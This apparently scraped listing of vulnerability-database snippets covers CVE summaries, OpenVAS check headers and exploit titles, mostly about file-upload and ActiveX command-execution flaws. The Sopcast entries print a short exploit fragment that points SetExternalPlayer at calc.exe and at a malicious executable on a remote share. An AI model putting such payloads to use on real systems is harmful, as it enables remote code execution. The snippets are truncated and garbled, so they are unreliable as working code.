Shadow: Privilege escalation

Background Shadow is a set of tools to deal with user accounts. Description Paul Szabo reported a race condition in the "login" executable when setting up tty permissions. Impact A local attacker belonging to the "utmp" group could use symlink attacks to overwrite arbitrary files and possibly gai...

RedHat Update for kernel RHSA-2007:1049-01

Check for the Version of kernel OpenVAS Vulnerability Test RedHat Update for kernel RHSA-2007:1049-01 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the ter...

Design/Logic Flaw

Insecure method vulnerability in the SopCast SopCore ActiveX control in sopocx.ocx 3.0.3.501 allows remote attackers to execute arbitrary programs via an executable file name in the argument to the SetExternalPlayer method...

CVE-2009-0811

Insecure method vulnerability in the SopCast SopCore ActiveX control in sopocx.ocx 3.0.3.501 allows remote attackers to execute arbitrary programs via an executable file name in the argument to the SetExternalPlayer method...

Sopcast SopCore Control - sopocx.ocx Command Execution

Sopcast SopCore Control - sopocx.ocx Command Execution window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe";...

Sopcast SopCore Control Command Execution

window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...

Unrestricted file upload

Unrestricted file upload vulnerability in Photos/createalbum.php in Social Groupie allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in Memberimages/...

CVE-2008-6367

Unrestricted file upload vulnerability in Photos/createalbum.php in Social Groupie allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in Memberimages/...

CentOS Update for sblim-cmpi-base CESA-2008:0497 centos4 x86_64

Check for the Version of sblim-cmpi-base OpenVAS Vulnerability Test CentOS Update for sblim-cmpi-base CESA-2008:0497 centos4 x8664 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it...

CentOS Update for kernel CESA-2007:1049 centos3 x86_64

Check for the Version of kernel OpenVAS Vulnerability Test CentOS Update for kernel CESA-2007:1049 centos3 x8664 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it...

CentOS Update for kernel CESA-2007:1049 centos3 i386

Check for the Version of kernel OpenVAS Vulnerability Test CentOS Update for kernel CESA-2007:1049 centos3 i386 Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it und...

Image upload formula deceptive vulnerability tutorials-vulnerability warning-the black bar safety net

For the reader: the script to attack the lovers, ASP programmer Pre-knowledge: none Image upload formula spoofing attacks Wen/ Yan into the This vulnerability applies to all only check the uploaded file format of the program, put the images into HTML code, after uploading the executable to do the...

Unrestricted file upload

Unrestricted file upload vulnerability in pages/download.php in Iamma Simple Gallery 1.0 and 2.0 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request to the file in the uploads directory...

E-mail attachment execution

Added: 01/28/2009 Background This tool sends an e-mail attachment which, when executed, establishes a command connection. Limitations This tool requires a user to execute the e-mail attachment in order to succeed. This tool requires the IP address of a working mail server which allows relaying of...

Word Viewer OCX 3.2 - Remote Command Execution

Word Viewer OCX 3.2 - Remote Command Execution ---------------------------------------------------------- Word viewer OCX V 3.2 Remote File execution exploit ---------------------------------------------------------- ----------------------------------- By Mountassif Moad a.k.a Stack...

CVE-2008-5677

Unrestricted file upload vulnerability in Kwalbum 2.0.4, 2.0.2, and earlier, when PICSPATH is located in the web root, allows remote authenticated users with upload capability to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the...

CVE-2008-5663

Multiple unrestricted file upload vulnerabilities in Kusaba 1.0.4 and earlier allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension using 1 loadreceiver.php or 2 a shipainter action to paintsave.php, then accessing the uploaded file via a dire...

CVE-2008-5677

Unrestricted file upload vulnerability in Kwalbum 2.0.4, 2.0.2, and earlier, when PICSPATH is located in the web root, allows remote authenticated users with upload capability to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the...

Design/Logic Flaw

Incomplete blacklist vulnerability in the Quarantine feature in CoreTypes in Apple Mac OS X 10.5 before 10.5.6 allows user-assisted remote attackers to execute arbitrary code via an executable file with the content type indicating no application association for the file, which does not trigger a...

CVE-2008-4234

Incomplete blacklist vulnerability in the Quarantine feature in CoreTypes in Apple Mac OS X 10.5 before 10.5.6 allows user-assisted remote attackers to execute arbitrary code via an executable file with the content type indicating no application association for the file, which does not trigger a...